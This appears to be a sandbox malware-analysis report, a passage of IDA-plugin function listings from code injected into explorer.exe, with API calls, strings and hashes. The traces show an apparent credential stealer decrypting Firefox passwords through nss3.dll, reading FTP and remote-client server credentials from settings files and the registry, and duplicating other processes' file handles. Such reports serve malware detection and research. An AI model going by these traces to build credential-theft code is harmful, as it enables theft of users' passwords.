                                                                                                        • Opcode Fuzzy Hash: b4f0edd643aca22d0bb443568e3cc623249a94c72b3492faf0725f05239dbc5a
                                                                                                        • Instruction Fuzzy Hash: 25E08C77644310BFCA136794AC04F6FB7689B98E50F050425FA10A6648C330985287B2
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(051F0000,00000000,?), ref: 030F9EF8
                                                                                                        Strings
                                                                                                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 030F9F0E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                        • API String ID: 3298025750-4030396798
                                                                                                        • Opcode ID: 2b0b83a535700fa982d1e7ec3d6a5e1f95031ff60c28ebf8c08c06fccd37713a
                                                                                                        • Instruction ID: 18ebc91b530eae160b99d0879368bb8358058f23061e3dfb6a2bdc50e62865e5
                                                                                                        • Opcode Fuzzy Hash: 2b0b83a535700fa982d1e7ec3d6a5e1f95031ff60c28ebf8c08c06fccd37713a
                                                                                                        • Instruction Fuzzy Hash: 71D0127B109301FFD646AB549C05F2B777D9B99A00F490418F22495459D37050D9AB72
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3498533004-0
                                                                                                        • Opcode ID: ca5ee7d1ba5ae5e1c089f020561a189782417fa9cc96f1aa28e6c9744c70cee1
                                                                                                        • Instruction ID: 13322649fde5a642ae51c4ec28af40e31d43f63d25705fd0a9cb4bcbd21b4170
                                                                                                        • Opcode Fuzzy Hash: ca5ee7d1ba5ae5e1c089f020561a189782417fa9cc96f1aa28e6c9744c70cee1
                                                                                                        • Instruction Fuzzy Hash: CDD0C275203230E6D6B962353C0CEA7AE4CDF035B5B480610B60CD54C4E310888781F0
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 030F116F
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2580854192-0
                                                                                                        • Opcode ID: ab0457cef0a5db8fc5b97c0cbc52fb997f196978a7a43cde0cc8b6363a42a5b7
                                                                                                        • Instruction ID: 7f048164292818705182d1f4a0b0b0671b2ba5027fd59a0acd201dfc4c0e1e40
                                                                                                        • Opcode Fuzzy Hash: ab0457cef0a5db8fc5b97c0cbc52fb997f196978a7a43cde0cc8b6363a42a5b7
                                                                                                        • Instruction Fuzzy Hash: 65C08C350023609BCAA877A4380CBCA2B08DF8E52AF080441B64197145CBA1888082B0
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1357844191-0
                                                                                                        • Opcode ID: 5fe0835f14394d821bc9527e0586a4f4d690236ce3a6ed8165b207546da74c19
                                                                                                        • Instruction ID: 7ecefe66d7112e9d137efc56ee224e9fa861f40fd82609d4665411ea54bd1773
                                                                                                        • Opcode Fuzzy Hash: 5fe0835f14394d821bc9527e0586a4f4d690236ce3a6ed8165b207546da74c19
                                                                                                        • Instruction Fuzzy Hash: 04A002795502045BDD4877A49A0DA1A3518F7C9B0AF104554718586045DB6454448731
                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 030F12B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 816449071-0
                                                                                                        • Opcode ID: dc19df8127c1519b878b9fe7ac53c56a870b415f72ba685b49028b7a53edef20
                                                                                                        • Instruction ID: 7ae18ad68ba866e38f64b0b834eb07008b004a2ca245f6a179f6613f29b93185
                                                                                                        • Opcode Fuzzy Hash: dc19df8127c1519b878b9fe7ac53c56a870b415f72ba685b49028b7a53edef20
                                                                                                        • Instruction Fuzzy Hash: CD1136B5A01209AFDB54EFE8E884ABEB7FCEB49611B040029FA45E3200D730D941CB70
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,030F2C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030F1BAA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: c901c166cca1bdd67d32091c819f4c6bbf360188ecbc187dbb018944d8f4acb9
                                                                                                        • Instruction ID: ddd91391a086215b3a61b55bf7c8a1f2b6005bc0334279084a92af4c26133682
                                                                                                        • Opcode Fuzzy Hash: c901c166cca1bdd67d32091c819f4c6bbf360188ecbc187dbb018944d8f4acb9
                                                                                                        • Instruction Fuzzy Hash: 67D0C933E17531CADAACA6787844896F6D06A4157931E07B4FE26F79D4E325CC8252D0
                                                                                                        APIs
                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 030F1684
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateGlobalStream
                                                                                                        • String ID:
                                                                                                        • API String ID: 2244384528-0
                                                                                                        • Opcode ID: b06a8da5a7ee1afb4de6c6150125568996fc4bd1c2cb38979827c351a2f331a4
                                                                                                        • Instruction ID: ddce6354b9f12bbf75cf00d70e1e21393541756593fc88c3102016b5d6789d27
                                                                                                        • Opcode Fuzzy Hash: b06a8da5a7ee1afb4de6c6150125568996fc4bd1c2cb38979827c351a2f331a4
                                                                                                        • Instruction Fuzzy Hash: A8C08030111131DFD7741A304C05B8535D49F0D7B2F060969F1C19D0C0D2F404C0C650
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,030F158A), ref: 030F1056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 6d67d87942ecf7645ab8637b74eb1643d3062ad5ba85c723784a578576f3dcb9
                                                                                                        • Instruction ID: cbb2d0bbae8623e96bd5b0b6ee39053500b2a31e2c5ac91f016a25325ada6787
                                                                                                        • Opcode Fuzzy Hash: 6d67d87942ecf7645ab8637b74eb1643d3062ad5ba85c723784a578576f3dcb9
                                                                                                        • Instruction Fuzzy Hash: 47A001B47953006AFE696762AE1BF1529289745B06F100244B309690C456E865408529
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,030F4A5B,?,?,00000000,?,?,?,?,030F4B66,?), ref: 030F1065
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 2594c0034cceab777ad57bce2fb5fc953bd6999e51905933fc941711c817a83d
                                                                                                        • Instruction ID: a0366d577e0dde0b11c812994876aa401e061b887fd8c9b0d8b657224b856982
                                                                                                        • Opcode Fuzzy Hash: 2594c0034cceab777ad57bce2fb5fc953bd6999e51905933fc941711c817a83d
                                                                                                        • Instruction Fuzzy Hash: C8A0027469070066EEB867205D0AF0526146785F05F2045547281A90C54AA5E0848A28
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 030F34C0
                                                                                                          • Part of subcall function 030F33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 030F3401
                                                                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,030F37A8), ref: 030F34E9
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 030F351E
                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 030F3541
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 030F3586
                                                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 030F358F
                                                                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 030F35B6
                                                                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 030F35DE
                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 030F35F6
                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 030F3606
                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 030F361E
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 030F3631
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 030F3658
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 030F366B
                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 030F3681
                                                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 030F36AD
                                                                                                        • CloseHandle.KERNEL32(?), ref: 030F36C0
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,030F37A8), ref: 030F36F5
                                                                                                          • Part of subcall function 030F1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 030F1CC0
                                                                                                          • Part of subcall function 030F1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 030F1CDA
                                                                                                          • Part of subcall function 030F1C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 030F1CE6
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,030F37A8), ref: 030F3707
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                        • String ID: File
                                                                                                        • API String ID: 3915112439-749574446
                                                                                                        • Opcode ID: d7b7f7956c5956fc5b18b17c005cf22a9990286dc53e67cb572e89c9ad7c559f
                                                                                                        • Instruction ID: 12668f6b39ffe2d5b4e0acb46df2ae2ab42eca6cc3e1ab13fb898c6b9a553ac7
                                                                                                        • Opcode Fuzzy Hash: d7b7f7956c5956fc5b18b17c005cf22a9990286dc53e67cb572e89c9ad7c559f
                                                                                                        • Instruction Fuzzy Hash: B361B078205300AFD764EF21CC44F2BBBE9EB89B65F040868FA86D6290D775D8848F65
                                                                                                        APIs
                                                                                                        • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 03144502
                                                                                                        • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0314475F
                                                                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 03144803
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp$memcpy
                                                                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                        • API String ID: 231171946-1096842476
                                                                                                        • Opcode ID: 6aa308ea5be54295dcb4b39f5d446956edf17345a4e14d50f37fa9b7a233b67f
                                                                                                        • Instruction ID: a60a74e704c2ec371e4099500d928ad21b5f4d5ebbd6dd325664ac9cb09a282f
                                                                                                        • Opcode Fuzzy Hash: 6aa308ea5be54295dcb4b39f5d446956edf17345a4e14d50f37fa9b7a233b67f
                                                                                                        • Instruction Fuzzy Hash: CFC10374A093869FDB34CF1A849077AB7E5AF8D214F0C096EE8D58B251DF34D4468B86
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F6AAA: memset.NTDLL ref: 030F6AC5
                                                                                                        • memset.NTDLL ref: 03115F53
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                        • API String ID: 2221118986-594550510
                                                                                                        • Opcode ID: 899fa9813df9fe39e893fce9e724fa4951e9125e6ce6fa44c187f09fc3567df8
                                                                                                        • Instruction ID: d31b1125a36c93ab1232674881d14b691fa10efa0b232418616014ef720dd67a
                                                                                                        • Opcode Fuzzy Hash: 899fa9813df9fe39e893fce9e724fa4951e9125e6ce6fa44c187f09fc3567df8
                                                                                                        • Instruction Fuzzy Hash: E8C18D746047019FCB14DF24C480AAEF7E6BFCC700F18896DE8559B241E776D966CB92
                                                                                                        APIs
                                                                                                        • CoCreateInstance.COMBASE(031462B0,00000000,00000001,031462A0,?), ref: 030F445F
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 030F44AA
                                                                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 030F456E
                                                                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 030F457D
                                                                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 030F458C
                                                                                                          • Part of subcall function 030F11E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,030F46E3), ref: 030F11ED
                                                                                                          • Part of subcall function 030F11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 030F120F
                                                                                                          • Part of subcall function 030F11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 030F1231
                                                                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 030F45BE
                                                                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 030F45CD
                                                                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 030F4657
                                                                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 030F4679
                                                                                                        • lstrcmpiW.KERNEL32(User,?), ref: 030F469F
                                                                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 030F46C5
                                                                                                        • wsprintfW.USER32 ref: 030F471E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                        • API String ID: 2230072276-1234691226
                                                                                                        • Opcode ID: 318f3ec00d0f6c34fae1910a7ce66c644c489c72b34aa01f7bbe6cf5733c482f
                                                                                                        • Instruction ID: 08016da35d17b215477b050bafc7e8b8e40b28dbd60be49ea85a4cfd48098e12
                                                                                                        • Opcode Fuzzy Hash: 318f3ec00d0f6c34fae1910a7ce66c644c489c72b34aa01f7bbe6cf5733c482f
                                                                                                        • Instruction Fuzzy Hash: 0BB11875204302AFD740DF65C844E6BB7E9EFC9749F04895CFA558B260DB71E806CB62
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                          • Part of subcall function 030F1090: lstrlenW.KERNEL32(?,?,00000000,030F17E5), ref: 030F1097
                                                                                                          • Part of subcall function 030F1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 030F10A8
                                                                                                          • Part of subcall function 030F19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,030F2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030F19C4
                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 030F2503
                                                                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 030F250A
                                                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 030F2563
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 030F2570
                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 030F2591
                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 030F259E
                                                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 030F25AB
                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 030F25B8
                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 030F25C5
                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 030F25D2
                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 030F25DF
                                                                                                          • Part of subcall function 030F190B: lstrlen.KERNEL32(?,?,?,?,00000000,030F2783), ref: 030F192B
                                                                                                          • Part of subcall function 030F190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,030F2783), ref: 030F1930
                                                                                                          • Part of subcall function 030F190B: lstrcat.KERNEL32(00000000,?), ref: 030F1946
                                                                                                          • Part of subcall function 030F190B: lstrcat.KERNEL32(00000000,00000000), ref: 030F194A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                        • API String ID: 3366569387-3272982511
                                                                                                        • Opcode ID: 58ee3e820e58c205d1750ed955bd41ef1e02932b8a9151f7ac5215a230c1adda
                                                                                                        • Instruction ID: d7762332dc1a418efa0f87761eb38427c8cab62acc5292b109dddf3ae7b35fb6
                                                                                                        • Opcode Fuzzy Hash: 58ee3e820e58c205d1750ed955bd41ef1e02932b8a9151f7ac5215a230c1adda
                                                                                                        • Instruction Fuzzy Hash: 4C416839A02311EFCF1CFF75995066E7AE99BCE646708083FDA41D7605DB788C458B60
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F5BF5: memset.NTDLL ref: 030F5C07
                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030F60E1
                                                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 030F60EC
                                                                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 030F6113
                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030F618E
                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030F61B5
                                                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 030F61C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _alldiv$_allrem$memset
                                                                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                        • API String ID: 2557048445-1989508764
                                                                                                        • Opcode ID: 1e4918b4fff74224fe84481b75be2956dfabddcb65cf70081fd47eaf55b9b825
                                                                                                        • Instruction ID: 2a16eb7e12281588f7d576a7eabeaad625f48c6a8f74f11043bd55b9e7a9bb5d
                                                                                                        • Opcode Fuzzy Hash: 1e4918b4fff74224fe84481b75be2956dfabddcb65cf70081fd47eaf55b9b825
                                                                                                        • Instruction Fuzzy Hash: 4AB1C2B1909346AFD375DE24CC84B3FBFD4FB86304F1C0989F682AAAC1E726C5148695
                                                                                                        APIs
                                                                                                        • memcmp.NTDLL(0314637A,BINARY,00000007), ref: 0310D324
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                        • API String ID: 1475443563-3683840195
                                                                                                        • Opcode ID: 494993f81b0fab32eb52a30b2a66ce5de7eca0fc7e967854b3eb95e24e5c6ac9
                                                                                                        • Instruction ID: d17a55bb50dbabebb47aacdadc4dcfddf838b60d163c843d9d09ad114b1001ba
                                                                                                        • Opcode Fuzzy Hash: 494993f81b0fab32eb52a30b2a66ce5de7eca0fc7e967854b3eb95e24e5c6ac9
                                                                                                        • Instruction Fuzzy Hash: 6451F471504300AFC724DFA4EC40A6AF7A5AF4D600F094859F9A59F681E3B1E849CB92
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A3C
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A75
                                                                                                          • Part of subcall function 030F19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A98
                                                                                                          • Part of subcall function 030F482C: lstrlenW.KERNEL32(?), ref: 030F4845
                                                                                                          • Part of subcall function 030F482C: lstrlenW.KERNEL32(?), ref: 030F488F
                                                                                                          • Part of subcall function 030F482C: lstrlenW.KERNEL32(?), ref: 030F4897
                                                                                                        • wsprintfW.USER32 ref: 030F49A7
                                                                                                        • wsprintfW.USER32 ref: 030F49B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                        • API String ID: 2889301010-4273187114
                                                                                                        • Opcode ID: c555c74cb7f685d9c5d6b76193dcad7256246b7c36e250f325e03abd2b6e273e
                                                                                                        • Instruction ID: 5f932d90beeaadcfc8da04c2cfa7dcd1d5a7eac2ad1cecb05dffe67215cdcedf
                                                                                                        • Opcode Fuzzy Hash: c555c74cb7f685d9c5d6b76193dcad7256246b7c36e250f325e03abd2b6e273e
                                                                                                        • Instruction Fuzzy Hash: 6C31243870E3049FC714EB66C85082FF6EDEFCA648B09491DBA4587640DBB2DC0187E1
                                                                                                        APIs
                                                                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 030FFB32
                                                                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 030FFB4D
                                                                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 030FFB60
                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 030FFB95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                                                        • API String ID: 3510742995-3408036318
                                                                                                        • Opcode ID: 3325d5f12cae4795ed257d813e595a9be1eefc4c75fe8bc0d343900c32e33bc9
                                                                                                        • Instruction ID: a2d04279c5326664957aa82f1100c67f9774fbf2186cbd6b29dcabc3a909fa4c
                                                                                                        • Opcode Fuzzy Hash: 3325d5f12cae4795ed257d813e595a9be1eefc4c75fe8bc0d343900c32e33bc9
                                                                                                        • Instruction Fuzzy Hash: AED1E6B56093418FC714DF28C880B6ABBE5AF85314F0C466DEE998F791E775D804CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
